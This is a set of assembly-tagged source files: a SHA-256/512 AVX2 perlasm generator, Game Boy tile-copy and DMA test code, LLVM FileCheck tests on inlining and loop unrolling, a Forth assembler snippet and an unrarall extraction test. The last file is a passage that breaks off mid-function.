mov $SZ*5($ctx),$F
mov $SZ*6($ctx),$G
mov $SZ*7($ctx),$H
___
if ($SZ==4) { # SHA256
my @X = map("%ymm$_",(0..3));
my ($t0,$t1,$t2,$t3, $t4,$t5) = map("%ymm$_",(4..9));
$code.=<<___;
vmovdqa $TABLE+`$SZ*2*$rounds`+32(%rip),$t4
vmovdqa $TABLE+`$SZ*2*$rounds`+64(%rip),$t5
jmp .Loop_avx2
.align 16
.Loop_avx2:
vmovdqa $TABLE+`$SZ*2*$rounds`(%rip),$t3
vmovdqu -16*$SZ+0($inp),%xmm0
vmovdqu -16*$SZ+16($inp),%xmm1
vmovdqu -16*$SZ+32($inp),%xmm2
vmovdqu -16*$SZ+48($inp),%xmm3
#mov $inp,$_inp # offload $inp
vinserti128 \$1,(%r12),@X[0],@X[0]
vinserti128 \$1,16(%r12),@X[1],@X[1]
vpshufb $t3,@X[0],@X[0]
vinserti128 \$1,32(%r12),@X[2],@X[2]
vpshufb $t3,@X[1],@X[1]
vinserti128 \$1,48(%r12),@X[3],@X[3]
lea $TABLE(%rip),$Tbl
vpshufb $t3,@X[2],@X[2]
vpaddd 0x00($Tbl),@X[0],$t0
vpshufb $t3,@X[3],@X[3]
vpaddd 0x20($Tbl),@X[1],$t1
vpaddd 0x40($Tbl),@X[2],$t2
vpaddd 0x60($Tbl),@X[3],$t3
vmovdqa $t0,0x00(%rsp)
xor $a1,$a1
vmovdqa $t1,0x20(%rsp)
lea -$PUSH8(%rsp),%rsp
mov $B,$a3
vmovdqa $t2,0x00(%rsp)
xor $C,$a3 # magic
vmovdqa $t3,0x20(%rsp)
mov $F,$a4
sub \$-16*2*$SZ,$Tbl # size optimization
jmp .Lavx2_00_47
.align 16
.Lavx2_00_47:
___
sub AVX2_256_00_47 () {
my $j = shift;
my $body = shift;
my @X = @_;
my @insns = (&$body,&$body,&$body,&$body); # 96 instructions
my $base = "+2*$PUSH8(%rsp)";
&lea ("%rsp","-$PUSH8(%rsp)") if (($j%2)==0);
foreach (Xupdate_256_AVX()) { # 29 instructions
eval;
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
}
&vpaddd ($t2,@X[0],16*2*$j."($Tbl)");
foreach (@insns) { eval; } # remaining instructions
&vmovdqa ((32*$j)%$PUSH8."(%rsp)",$t2);
}
for ($i=0,$j=0; $j<4; $j++) {
&AVX2_256_00_47($j,\&bodyx_00_15,@X);
push(@X,shift(@X)); # rotate(@X)
}
&lea ($Tbl,16*2*$SZ."($Tbl)");
&cmpb (($SZ-1)."($Tbl)",0);
&jne (".Lavx2_00_47");
for ($i=0; $i<16; ) {
my $base=$i<8?"+$PUSH8(%rsp)":"(%rsp)";
foreach(bodyx_00_15()) { eval; }
}
} else { # SHA512
my @X = map("%ymm$_",(0..7));
my ($t0,$t1,$t2,$t3) = map("%ymm$_",(8..11));
$code.=<<___;
jmp .Loop_avx2
.align 16
.Loop_avx2:
vmovdqu -16*$SZ($inp),%xmm0
vmovdqu -16*$SZ+16($inp),%xmm1
vmovdqu -16*$SZ+32($inp),%xmm2
lea $TABLE+0x80(%rip),$Tbl # size optimization
vmovdqu -16*$SZ+48($inp),%xmm3
vmovdqu -16*$SZ+64($inp),%xmm4
vmovdqu -16*$SZ+80($inp),%xmm5
vmovdqu -16*$SZ+96($inp),%xmm6
vmovdqu -16*$SZ+112($inp),%xmm7
#mov $inp,$_inp # offload $inp
vmovdqa `$SZ*2*$rounds-0x80`($Tbl),$t2
vinserti128 \$1,(%r12),@X[0],@X[0]
vinserti128 \$1,16(%r12),@X[1],@X[1]
vpshufb $t2,@X[0],@X[0]
vinserti128 \$1,32(%r12),@X[2],@X[2]
vpshufb $t2,@X[1],@X[1]
vinserti128 \$1,48(%r12),@X[3],@X[3]
vpshufb $t2,@X[2],@X[2]
vinserti128 \$1,64(%r12),@X[4],@X[4]
vpshufb $t2,@X[3],@X[3]
vinserti128 \$1,80(%r12),@X[5],@X[5]
vpshufb $t2,@X[4],@X[4]
vinserti128 \$1,96(%r12),@X[6],@X[6]
vpshufb $t2,@X[5],@X[5]
vinserti128 \$1,112(%r12),@X[7],@X[7]
vpaddq -0x80($Tbl),@X[0],$t0
vpshufb $t2,@X[6],@X[6]
vpaddq -0x60($Tbl),@X[1],$t1
vpshufb $t2,@X[7],@X[7]
vpaddq -0x40($Tbl),@X[2],$t2
vpaddq -0x20($Tbl),@X[3],$t3
vmovdqa $t0,0x00(%rsp)
vpaddq 0x00($Tbl),@X[4],$t0
vmovdqa $t1,0x20(%rsp)
vpaddq 0x20($Tbl),@X[5],$t1
vmovdqa $t2,0x40(%rsp)
vpaddq 0x40($Tbl),@X[6],$t2
vmovdqa $t3,0x60(%rsp)
lea -$PUSH8(%rsp),%rsp
vpaddq 0x60($Tbl),@X[7],$t3
vmovdqa $t0,0x00(%rsp)
xor $a1,$a1
vmovdqa $t1,0x20(%rsp)
mov $B,$a3
vmovdqa $t2,0x40(%rsp)
xor $C,$a3 # magic
vmovdqa $t3,0x60(%rsp)
mov $F,$a4
add \$16*2*$SZ,$Tbl
jmp .Lavx2_00_47
.align 16
.Lavx2_00_47:
___
sub AVX2_512_00_47 () {
my $j = shift;
my $body = shift;
my @X = @_;
my @insns = (&$body,&$body); # 48 instructions
my $base = "+2*$PUSH8(%rsp)";
&lea ("%rsp","-$PUSH8(%rsp)") if (($j%4)==0);
foreach (Xupdate_512_AVX()) { # 23 instructions
eval;
if ($_ !~ /\;$/) {
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
}
}
&vpaddq ($t2,@X[0],16*2*$j-0x80."($Tbl)");
foreach (@insns) { eval; } # remaining instructions
&vmovdqa ((32*$j)%$PUSH8."(%rsp)",$t2);
}
for ($i=0,$j=0; $j<8; $j++) {
&AVX2_512_00_47($j,\&bodyx_00_15,@X);
push(@X,shift(@X)); # rotate(@X)
}
&lea ($Tbl,16*2*$SZ."($Tbl)");
&cmpb (($SZ-1-0x80)."($Tbl)",0);
&jne (".Lavx2_00_47");
for ($i=0; $i<16; ) {
my $base=$i<8?"+$PUSH8(%rsp)":"(%rsp)";
foreach(bodyx_00_15()) { eval; }
}
}
$code.=<<___;
mov `2*$SZ*$rounds`(%rsp),$ctx # $_ctx
add $a1,$A
#mov `2*$SZ*$rounds+8`(%rsp),$inp # $_inp
lea `2*$SZ*($rounds-8)`(%rsp),$Tbl
add $SZ*0($ctx),$A
add $SZ*1($ctx),$B
add $SZ*2($ctx),$C
add $SZ*3($ctx),$D
add $SZ*4($ctx),$E
add $SZ*5($ctx),$F
add $SZ*6($ctx),$G
add $SZ*7($ctx),$H
mov $A,$SZ*0($ctx)
mov $B,$SZ*1($ctx)
mov $C,$SZ*2($ctx)
mov $D,$SZ*3($ctx)
mov $E,$SZ*4($ctx)
mov $F,$SZ*5($ctx)
mov $G,$SZ*6($ctx)
mov $H,$SZ*7($ctx)
cmp `$PUSH8+2*8`($Tbl),$inp # $_end
je .Ldone_avx2
xor $a1,$a1
mov $B,$a3
xor $C,$a3 # magic
mov $F,$a4
jmp .Lower_avx2
.align 16
.Lower_avx2:
___
for ($i=0; $i<8; ) {
my $base="+16($Tbl)";
foreach(bodyx_00_15()) { eval; }
}
$code.=<<___;
lea -$PUSH8($Tbl),$Tbl
cmp %rsp,$Tbl
jae .Lower_avx2
mov `2*$SZ*$rounds`(%rsp),$ctx # $_ctx
add $a1,$A
#mov `2*$SZ*$rounds+8`(%rsp),$inp # $_inp
lea `2*$SZ*($rounds-8)`(%rsp),%rsp
add $SZ*0($ctx),$A
add $SZ*1($ctx),$B
add $SZ*2($ctx),$C
add $SZ*3($ctx),$D
add $SZ*4($ctx),$E
add $SZ*5($ctx),$F
lea `2*16*$SZ`($inp),$inp # inp+=2
add $SZ*6($ctx),$G
mov $inp,%r12
add $SZ*7($ctx),$H
cmp $_end,$inp
mov $A,$SZ*0($ctx)
cmove %rsp,%r12 # next block or stale data
mov $B,$SZ*1($ctx)
mov $C,$SZ*2($ctx)
mov $D,$SZ*3($ctx)
mov $E,$SZ*4($ctx)
mov $F,$SZ*5($ctx)
mov $G,$SZ*6($ctx)
mov $H,$SZ*7($ctx)
jbe .Loop_avx2
lea (%rsp),$Tbl
.Ldone_avx2:
lea ($Tbl),%rsp
mov $_rsp,%rsi
vzeroupper
___
$code.=<<___ if ($win64);
movaps 16*$SZ+32(%rsp),%xmm6
movaps 16*$SZ+48(%rsp),%xmm7
movaps 16*$SZ+64(%rsp),%xmm8
movaps 16*$SZ+80(%rsp),%xmm9
___
$code.=<<___ if ($win64 && $SZ>4);
movaps 16*$SZ+96(%rsp),%xmm10
movaps 16*$SZ+112(%rsp),%xmm11
___
$code.=<<___;
mov (%rsi),%r15
mov 8(%rsi),%r14
mov 16(%rsi),%r13
mov 24(%rsi),%r12
mov 32(%rsi),%rbp
mov 40(%rsi),%rbx
lea 48(%rsi),%rsp
.Lepilogue_avx2:
ret
.size ${func}_avx2,.-${func}_avx2
___
}}
}}}}}
# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
# CONTEXT *context,DISPATCHER_CONTEXT *disp)
if ($win64) {
$rec="%rcx";
$frame="%rdx";
$context="%r8";
$disp="%r9";
$code.=<<___;
.extern __imp_RtlVirtualUnwind
.type se_handler,\@abi-omnipotent
.align 16
se_handler:
push %rsi
push %rdi
push %rbx
push %rbp
push %r12
push %r13
push %r14
push %r15
pushfq
sub \$64,%rsp
mov 120($context),%rax # pull context->Rax
mov 248($context),%rbx # pull context->Rip
mov 8($disp),%rsi # disp->ImageBase
mov 56($disp),%r11 # disp->HanderlData
mov 0(%r11),%r10d # HandlerData[0]
lea (%rsi,%r10),%r10 # prologue label
cmp %r10,%rbx # context->Rip<prologue label
jb .Lin_prologue
mov 152($context),%rax # pull context->Rsp
mov 4(%r11),%r10d # HandlerData[1]
lea (%rsi,%r10),%r10 # epilogue label
cmp %r10,%rbx # context->Rip>=epilogue label
jae .Lin_prologue
___
$code.=<<___ if ($avx>1);
lea .Lavx2_shortcut(%rip),%r10
cmp %r10,%rbx # context->Rip<avx2_shortcut
jb .Lnot_in_avx2
and \$-256*$SZ,%rax
add \$`2*$SZ*($rounds-8)`,%rax
.Lnot_in_avx2:
___
$code.=<<___;
mov %rax,%rsi # put aside Rsp
mov 16*$SZ+3*8(%rax),%rax # pull $_rsp
lea 48(%rax),%rax
mov -8(%rax),%rbx
mov -16(%rax),%rbp
mov -24(%rax),%r12
mov -32(%rax),%r13
mov -40(%rax),%r14
mov -48(%rax),%r15
mov %rbx,144($context) # restore context->Rbx
mov %rbp,160($context) # restore context->Rbp
mov %r12,216($context) # restore context->R12
mov %r13,224($context) # restore context->R13
mov %r14,232($context) # restore context->R14
mov %r15,240($context) # restore context->R15
lea .Lepilogue(%rip),%r10
cmp %r10,%rbx
jb .Lin_prologue # non-AVX code
lea 16*$SZ+4*8(%rsi),%rsi # Xmm6- save area
lea 512($context),%rdi # &context.Xmm6
mov \$`$SZ==4?8:12`,%ecx
.long 0xa548f3fc # cld; rep movsq
.Lin_prologue:
mov 8(%rax),%rdi
mov 16(%rax),%rsi
mov %rax,152($context) # restore context->Rsp
mov %rsi,168($context) # restore context->Rsi
mov %rdi,176($context) # restore context->Rdi
mov 40($disp),%rdi # disp->ContextRecord
mov $context,%rsi # context
mov \$154,%ecx # sizeof(CONTEXT)
.long 0xa548f3fc # cld; rep movsq
mov $disp,%rsi
xor %rcx,%rcx # arg1, UNW_FLAG_NHANDLER
mov 8(%rsi),%rdx # arg2, disp->ImageBase
mov 0(%rsi),%r8 # arg3, disp->ControlPc
mov 16(%rsi),%r9 # arg4, disp->FunctionEntry
mov 40(%rsi),%r10 # disp->ContextRecord
lea 56(%rsi),%r11 # &disp->HandlerData
lea 24(%rsi),%r12 # &disp->EstablisherFrame
mov %r10,32(%rsp) # arg5
mov %r11,40(%rsp) # arg6
mov %r12,48(%rsp) # arg7
mov %rcx,56(%rsp) # arg8, (NULL)
call *__imp_RtlVirtualUnwind(%rip)
mov \$1,%eax # ExceptionContinueSearch
add \$64,%rsp
popfq
pop %r15
pop %r14
pop %r13
pop %r12
pop %rbp
pop %rbx
pop %rdi
pop %rsi
ret
.size se_handler,.-se_handler
___
$code.=<<___ if ($SZ==4 && $shaext);
.type shaext_handler,\@abi-omnipotent
.align 16
shaext_handler:
push %rsi
push %rdi
push %rbx
push %rbp
push %r12
push %r13
push %r14
push %r15
pushfq
sub \$64,%rsp
mov 120($context),%rax # pull context->Rax
mov 248($context),%rbx # pull context->Rip
lea .Lprologue_shaext(%rip),%r10
cmp %r10,%rbx # context->Rip<.Lprologue
jb .Lin_prologue
lea .Lepilogue_shaext(%rip),%r10
cmp %r10,%rbx # context->Rip>=.Lepilogue
jae .Lin_prologue
lea -8-5*16(%rax),%rsi
lea 512($context),%rdi # &context.Xmm6
mov \$10,%ecx
.long 0xa548f3fc # cld; rep movsq
jmp .Lin_prologue
.size shaext_handler,.-shaext_handler
___
$code.=<<___;
.section .pdata
.align 4
.rva .LSEH_begin_$func
.rva .LSEH_end_$func
.rva .LSEH_info_$func
___
$code.=<<___ if ($SZ==4 && $shaext);
.rva .LSEH_begin_${func}_shaext
.rva .LSEH_end_${func}_shaext
.rva .LSEH_info_${func}_shaext
___
$code.=<<___ if ($SZ==4);
.rva .LSEH_begin_${func}_ssse3
.rva .LSEH_end_${func}_ssse3
.rva .LSEH_info_${func}_ssse3
___
$code.=<<___ if ($avx && $SZ==8);
.rva .LSEH_begin_${func}_xop
.rva .LSEH_end_${func}_xop
.rva .LSEH_info_${func}_xop
___
$code.=<<___ if ($avx);
.rva .LSEH_begin_${func}_avx
.rva .LSEH_end_${func}_avx
.rva .LSEH_info_${func}_avx
___
$code.=<<___ if ($avx>1);
.rva .LSEH_begin_${func}_avx2
.rva .LSEH_end_${func}_avx2
.rva .LSEH_info_${func}_avx2
___
$code.=<<___;
.section .xdata
.align 8
.LSEH_info_$func:
.byte 9,0,0,0
.rva se_handler
.rva .Lprologue,.Lepilogue # HandlerData[]
___
$code.=<<___ if ($SZ==4 && $shaext);
.LSEH_info_${func}_shaext:
.byte 9,0,0,0
.rva shaext_handler
___
$code.=<<___ if ($SZ==4);
.LSEH_info_${func}_ssse3:
.byte 9,0,0,0
.rva se_handler
.rva .Lprologue_ssse3,.Lepilogue_ssse3 # HandlerData[]
___
$code.=<<___ if ($avx && $SZ==8);
.LSEH_info_${func}_xop:
.byte 9,0,0,0
.rva se_handler
.rva .Lprologue_xop,.Lepilogue_xop # HandlerData[]
___
$code.=<<___ if ($avx);
.LSEH_info_${func}_avx:
.byte 9,0,0,0
.rva se_handler
.rva .Lprologue_avx,.Lepilogue_avx # HandlerData[]
___
$code.=<<___ if ($avx>1);
.LSEH_info_${func}_avx2:
.byte 9,0,0,0
.rva se_handler
.rva .Lprologue_avx2,.Lepilogue_avx2 # HandlerData[]
___
}
sub sha256op38 {
my $instr = shift;
my %opcodelet = (
"sha256rnds2" => 0xcb,
"sha256msg1" => 0xcc,
"sha256msg2" => 0xcd );
if (defined($opcodelet{$instr}) && @_[0] =~ /%xmm([0-7]),\s*%xmm([0-7])/) {
my @opcode=(0x0f,0x38);
push @opcode,$opcodelet{$instr};
push @opcode,0xc0|($1&7)|(($2&7)<<3); # ModR/M
return ".byte\t".join(',',@opcode);
} else {
return $instr."\t".@_[0];
}
}
foreach (split("\n",$code)) {
s/\`([^\`]*)\`/eval $1/geo;
s/\b(sha256[^\s]*)\s+(.*)/sha256op38($1,$2)/geo;
print $_,"\n";
}
close STDOUT;
| {
"language": "Assembly"
} |
MODULE set_bkg_data
PUBLIC set_bkg_data
PUBLIC _set_bkg_data
PUBLIC set_win_data
PUBLIC _set_win_data
PUBLIC set_sprite_data
PUBLIC _set_sprite_data
GLOBAL copy_vram
SECTION code_driver
INCLUDE "target/gb/def/gb_globals.def"
; void __LIB__ set_bkg_data(uint8_t first_tile, uint8_t nb_tiles, unsigned char *data) NONBANKED;
; void __LIB__ set_win_data(uint8_t first_tile, uint8_t nb_tiles, unsigned char *data) __smallc NONBANKED;
set_bkg_data:
_set_bkg_data:
set_win_data:
_set_win_data:
LDH A,(LCDC)
BIT 4,A
JP NZ,_set_sprite_data
PUSH BC
ld hl,sp+4
LD C,(HL) ; BC = data
INC HL
LD B,(HL)
INC HL
LD E,(HL) ; E = nb_tiles
INC HL
INC HL
LD L,(HL) ; L = first_tile
PUSH HL
XOR A
OR E ; Is nb_tiles == 0?
JR NZ,set_1
LD DE,0x1000 ; DE = nb_tiles = 256
JR set_2
set_1:
LD H,0x00 ; HL = nb_tiles
LD L,E
ADD HL,HL ; HL *= 16
ADD HL,HL
ADD HL,HL
ADD HL,HL
LD D,H ; DE = nb_tiles
LD E,L
set_2:
POP HL ; HL = first_tile
LD A,L
RLCA ; Sign extend (patterns have signed numbers)
SBC A
LD H,A
ADD HL,HL ; HL *= 16
ADD HL,HL
ADD HL,HL
ADD HL,HL
PUSH BC
LD BC,0x9000
ADD HL,BC
POP BC
set_3: ; Special version of '.copy_vram'
BIT 3,H ; Bigger than 0x9800
JR Z,set_4
BIT 4,H
JR Z,set_4
RES 4,H ; Switch to 0x8800
set_4:
LDH A,(STAT)
AND 0x02
JR NZ,set_4
LD A,(BC)
LD (HL+),A
INC BC
DEC DE
LD A,D
OR E
JR NZ,set_3
POP BC
RET
; void __LIB__ set_sprite_data(uint8_t first_tile, uint8_t nb_tiles, unsigned char *data) __smallc NONBANKED;
_set_sprite_data:
set_sprite_data:
PUSH BC
ld hl,sp+4
LD C,(HL) ; BC = data
INC HL
LD B,(HL)
INC HL
LD E,(HL) ; E = nb_tiles
INC HL
INC HL
LD L,(HL) ; L = first_tile
PUSH HL
XOR A
OR E ; Is nb_tiles == 0?
JR NZ,spr_1
LD DE,0x1000 ; DE = nb_tiles = 256
JR spr_2
spr_1:
LD H,0x00 ; HL = nb_tiles
LD L,E
ADD HL,HL ; HL *= 16
ADD HL,HL
ADD HL,HL
ADD HL,HL
LD D,H ; DE = nb_tiles
LD E,L
spr_2:
POP HL ; HL = first_tile
LD H,0x00
ADD HL,HL ; HL *= 16
ADD HL,HL
ADD HL,HL
ADD HL,HL
PUSH BC
LD BC,0x8000
ADD HL,BC
POP BC
CALL copy_vram
POP BC
RET
| {
"language": "Assembly"
} |
; RUN: opt < %s -S -inline -inline-threshold=20 | FileCheck %s
; RUN: opt < %s -S -passes='cgscc(inline)' -inline-threshold=20 | FileCheck %s
; Check that we don't drop FastMathFlag when estimating inlining profitability.
;
; In this test we should inline 'foo' to 'boo', because it'll fold to a
; constant.
target datalayout = "e-m:o-i64:64-f80:128-n8:16:32:64-S128"
define float @foo(float* %a, float %b) {
entry:
%a0 = load float, float* %a, align 4
%mul = fmul fast float %a0, %b
%tobool = fcmp une float %mul, 0.000000e+00
br i1 %tobool, label %if.then, label %if.end
if.then: ; preds = %entry
%a1 = load float, float* %a, align 8
%arrayidx1 = getelementptr inbounds float, float* %a, i64 1
%a2 = load float, float* %arrayidx1, align 4
%add = fadd fast float %a1, %a2
br label %if.end
if.end: ; preds = %if.then, %entry
%storemerge = phi float [ %add, %if.then ], [ 1.000000e+00, %entry ]
ret float %storemerge
}
; CHECK-LABEL: @boo
; CHECK-NOT: call float @foo
define float @boo(float* %a) {
entry:
%call = call float @foo(float* %a, float 0.000000e+00)
ret float %call
}
| {
"language": "Assembly"
} |
( ixy+- HL rd )
: LDIXYr,
( dd/fd has already been spit )
LDrr, ( ixy+- )
A,
;
( rd ixy+- HL )
: LDrIXY,
ROT ( ixy+- HL rd )
SWAP ( ixy+- rd HL )
LDIXYr,
;
| {
"language": "Assembly"
} |
// ---------------------------------------------------------------------
//
// Copyright (C) 2013 - 2019 by the deal.II authors
//
// This file is part of the deal.II library.
//
// The deal.II library is free software; you can use it, redistribute
// it, and/or modify it under the terms of the GNU Lesser General
// Public License as published by the Free Software Foundation; either
// version 2.1 of the License, or (at your option) any later version.
// The full text of the license can be found in the file LICENSE.md at
// the top level directory of deal.II.
//
// ---------------------------------------------------------------------
for (S : VECTOR_TYPES)
{
template class SolverBase<S>;
}
| {
"language": "Assembly"
} |
.size 8000
.text@48
jp ff80
.text@100
jp lbegin
.data@143
80
.text@200
ld sp, fea1
ld hl, aa55
push hl
ld a, ef
ldff(46), a
ld c, 27
lwaitdma:
dec c
jrnz lwaitdma
pop de
ld a, (fe9d)
ld c, a
ld a, (fe9e)
ld b, a
ld sp, cfff
push de
push bc
jp lprint4
.text@150
lbegin:
ld bc, 0200
ld hl, ff80
ld d, 40
lcopydmaroutine:
ld a, (bc)
ld(hl++), a
inc c
dec d
jrnz lcopydmaroutine
ld b, 90
call lwaitly_b
ld bc, fe00
ld d, a0
ld a, 06
lfill_oam:
ld(bc), a
inc c
dec d
jrnz lfill_oam
ld hl, ef98
ld d, 08
ld a, 10
ld b, 11
lfill_wram:
ld(hl++), a
add a, b
dec d
jrnz lfill_wram
ld a, 90
ldff(45), a
ld a, 40
ldff(41), a
xor a, a
ldff(0f), a
ld a, 02
ldff(ff), a
ei
halt
.text@7000
lprint4:
ld b, 90
call lwaitly_b
xor a, a
ldff(40), a
ld bc, 7a00
ld hl, 8000
ld d, 00
lprint_copytiles:
ld a, (bc)
inc bc
ld(hl++), a
dec d
jrnz lprint_copytiles
ld hl, 9800
ld d, 02
lprint_settiles:
pop bc
ld a, c
srl a
srl a
srl a
srl a
ld(hl++), a
ld a, c
and a, 0f
ld(hl++), a
ld a, b
srl a
srl a
srl a
srl a
ld(hl++), a
ld a, b
and a, 0f
ld(hl++), a
dec d
jrnz lprint_settiles
ld a, c0
ldff(47), a
ld a, 80
ldff(68), a
ld a, ff
ldff(69), a
ldff(69), a
ldff(69), a
ldff(69), a
ldff(69), a
ldff(69), a
xor a, a
ldff(69), a
ldff(69), a
ldff(43), a
ld a, 91
ldff(40), a
lprint_limbo:
jr lprint_limbo
.text@7400
lwaitly_b:
ld c, 44
lwaitly_b_loop:
ldff a, (c)
cmp a, b
jrnz lwaitly_b_loop
ret
.data@7a00
00 00 7f 7f 41 41 41 41
41 41 41 41 41 41 7f 7f
00 00 08 08 08 08 08 08
08 08 08 08 08 08 08 08
00 00 7f 7f 01 01 01 01
7f 7f 40 40 40 40 7f 7f
00 00 7f 7f 01 01 01 01
3f 3f 01 01 01 01 7f 7f
00 00 41 41 41 41 41 41
7f 7f 01 01 01 01 01 01
00 00 7f 7f 40 40 40 40
7e 7e 01 01 01 01 7e 7e
00 00 7f 7f 40 40 40 40
7f 7f 41 41 41 41 7f 7f
00 00 7f 7f 01 01 02 02
04 04 08 08 10 10 10 10
00 00 3e 3e 41 41 41 41
3e 3e 41 41 41 41 3e 3e
00 00 7f 7f 41 41 41 41
7f 7f 01 01 01 01 7f 7f
00 00 08 08 22 22 41 41
7f 7f 41 41 41 41 41 41
00 00 7e 7e 41 41 41 41
7e 7e 41 41 41 41 7e 7e
00 00 3e 3e 41 41 40 40
40 40 40 40 41 41 3e 3e
00 00 7e 7e 41 41 41 41
41 41 41 41 41 41 7e 7e
00 00 7f 7f 40 40 40 40
7f 7f 40 40 40 40 7f 7f
00 00 7f 7f 40 40 40 40
7f 7f 40 40 40 40 40 40
| {
"language": "Assembly"
} |
; RUN: llc -mtriple=arm-eabi %s -o - | FileCheck %s
; This loop is rewritten with an indvar which counts down, which
; frees up a register from holding the trip count.
define void @test(i32* %P, i32 %A, i32 %i) nounwind {
entry:
; CHECK: str r1, [{{r.*}}, {{r.*}}, lsl #2]
icmp eq i32 %i, 0 ; <i1>:0 [#uses=1]
br i1 %0, label %return, label %bb
bb: ; preds = %bb, %entry
%indvar = phi i32 [ 0, %entry ], [ %indvar.next, %bb ] ; <i32> [#uses=2]
%i_addr.09.0 = sub i32 %i, %indvar ; <i32> [#uses=1]
%tmp2 = getelementptr i32* %P, i32 %i_addr.09.0 ; <i32*> [#uses=1]
store i32 %A, i32* %tmp2
%indvar.next = add i32 %indvar, 1 ; <i32> [#uses=2]
icmp eq i32 %indvar.next, %i ; <i1>:1 [#uses=1]
br i1 %1, label %return, label %bb
return: ; preds = %bb, %entry
ret void
}
; This loop has a non-address use of the count-up indvar, so
; it'll remain. Now the original store uses a negative-stride address.
define void @test_with_forced_iv(i32* %P, i32 %A, i32 %i) nounwind {
entry:
; CHECK: str r1, [{{r.*}}, -{{r.*}}, lsl #2]
icmp eq i32 %i, 0 ; <i1>:0 [#uses=1]
br i1 %0, label %return, label %bb
bb: ; preds = %bb, %entry
%indvar = phi i32 [ 0, %entry ], [ %indvar.next, %bb ] ; <i32> [#uses=2]
%i_addr.09.0 = sub i32 %i, %indvar ; <i32> [#uses=1]
%tmp2 = getelementptr i32* %P, i32 %i_addr.09.0 ; <i32*> [#uses=1]
store i32 %A, i32* %tmp2
store i32 %indvar, i32* null
%indvar.next = add i32 %indvar, 1 ; <i32> [#uses=2]
icmp eq i32 %indvar.next, %i ; <i1>:1 [#uses=1]
br i1 %1, label %return, label %bb
return: ; preds = %bb, %entry
ret void
}
| {
"language": "Assembly"
} |
# REQUIRES: rar_binary
# Remove old temporary working directory
# RUN: rm -rf %t
# RUN: mkdir -p %t
# RUN: cd %t
# RUN: mkdir a
# RUN: echo "Test file" > test_file
# RUN: %rar a a/test.rar test_file
# RUN: test -f a/test.rar
# RUN: rm test_file
# RUN: mkdir b
# RUN: echo "Test file 2" > test_file_2
# RUN: %rar a b/test.rar test_file_2
# RUN: test -f b/test.rar
# RUN: rm test_file_2
# Check the test files are extracted to the correct location and the rar files
# are removed.
# RUN: %unrarall --clean=rar .
# RUN: test -f a/test_file
# RUN: test -f b/test_file_2
# RUN: test ! -f a/test.rar
# RUN: test ! -f b/test.rar
| {
"language": "Assembly"
} |
; RUN: opt < %s -loop-unroll -S | FileCheck %s
; RUN: opt < %s -loop-unroll -loop-unroll -S | FileCheck %s
;
; Run loop unrolling twice to verify that loop unrolling metadata is properly
; removed and further unrolling is disabled after the pass is run once.
target datalayout = "e-m:e-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"
; loop4 contains a small loop which should be completely unrolled by
; the default unrolling heuristics. It serves as a control for the
; unroll(disable) pragma test loop4_with_disable.
;
; CHECK-LABEL: @loop4(
; CHECK-NOT: br i1
define void @loop4(i32* nocapture %a) {
entry:
br label %for.body
for.body: ; preds = %for.body, %entry
%indvars.iv = phi i64 [ 0, %entry ], [ %indvars.iv.next, %for.body ]
%arrayidx = getelementptr inbounds i32* %a, i64 %indvars.iv
%0 = load i32* %arrayidx, align 4
%inc = add nsw i32 %0, 1
store i32 %inc, i32* %arrayidx, align 4
%indvars.iv.next = add nuw nsw i64 %indvars.iv, 1
%exitcond = icmp eq i64 %indvars.iv.next, 4
br i1 %exitcond, label %for.end, label %for.body
for.end: ; preds = %for.body
ret void
}
; #pragma clang loop unroll(disable)
;
; CHECK-LABEL: @loop4_with_disable(
; CHECK: store i32
; CHECK-NOT: store i32
; CHECK: br i1
define void @loop4_with_disable(i32* nocapture %a) {
entry:
br label %for.body
for.body: ; preds = %for.body, %entry
%indvars.iv = phi i64 [ 0, %entry ], [ %indvars.iv.next, %for.body ]
%arrayidx = getelementptr inbounds i32* %a, i64 %indvars.iv
%0 = load i32* %arrayidx, align 4
%inc = add nsw i32 %0, 1
store i32 %inc, i32* %arrayidx, align 4
%indvars.iv.next = add nuw nsw i64 %indvars.iv, 1
%exitcond = icmp eq i64 %indvars.iv.next, 4
br i1 %exitcond, label %for.end, label %for.body, !llvm.loop !1
for.end: ; preds = %for.body
ret void
}
!1 = !{!1, !2}
!2 = !{!"llvm.loop.unroll.disable"}
; loop64 has a high enough count that it should *not* be unrolled by
; the default unrolling heuristic. It serves as the control for the
; unroll(full) pragma test loop64_with_.* tests below.
;
; CHECK-LABEL: @loop64(
; CHECK: store i32
; CHECK-NOT: store i32
; CHECK: br i1
define void @loop64(i32* nocapture %a) {
entry:
br label %for.body
for.body: ; preds = %for.body, %entry
%indvars.iv = phi i64 [ 0, %entry ], [ %indvars.iv.next, %for.body ]
%arrayidx = getelementptr inbounds i32* %a, i64 %indvars.iv
%0 = load i32* %arrayidx, align 4
%inc = add nsw i32 %0, 1
store i32 %inc, i32* %arrayidx, align 4
%indvars.iv.next = add nuw nsw i64 %indvars.iv, 1
%exitcond = icmp eq i64 %indvars.iv.next, 64
br i1 %exitcond, label %for.end, label %for.body
for.end: ; preds = %for.body
ret void
}
; #pragma clang loop unroll(full)
; Loop should be fully unrolled.
;
; CHECK-LABEL: @loop64_with_enable(
; CHECK-NOT: br i1
define void @loop64_with_enable(i32* nocapture %a) {
entry:
br label %for.body
for.body: ; preds = %for.body, %entry
%indvars.iv = phi i64 [ 0, %entry ], [ %indvars.iv.next, %for.body ]
%arrayidx = getelementptr inbounds i32* %a, i64 %indvars.iv
%0 = load i32* %arrayidx, align 4
%inc = add nsw i32 %0, 1
store i32 %inc, i32* %arrayidx, align 4
%indvars.iv.next = add nuw nsw i64 %indvars.iv, 1
%exitcond = icmp eq i64 %indvars.iv.next, 64
br i1 %exitcond, label %for.end, label %for.body, !llvm.loop !3
for.end: ; preds = %for.body
ret void
}
!3 = !{!3, !4}
!4 = !{!"llvm.loop.unroll.full"}
; #pragma clang loop unroll_count(4)
; Loop should be unrolled 4 times.
;
; CHECK-LABEL: @loop64_with_count4(
; CHECK: store i32
; CHECK: store i32
; CHECK: store i32
; CHECK: store i32
; CHECK-NOT: store i32
; CHECK: br i1
define void @loop64_with_count4(i32* nocapture %a) {
entry:
br label %for.body
for.body: ; preds = %for.body, %entry
%indvars.iv = phi i64 [ 0, %entry ], [ %indvars.iv.next, %for.body ]
%arrayidx = getelementptr inbounds i32* %a, i64 %indvars.iv
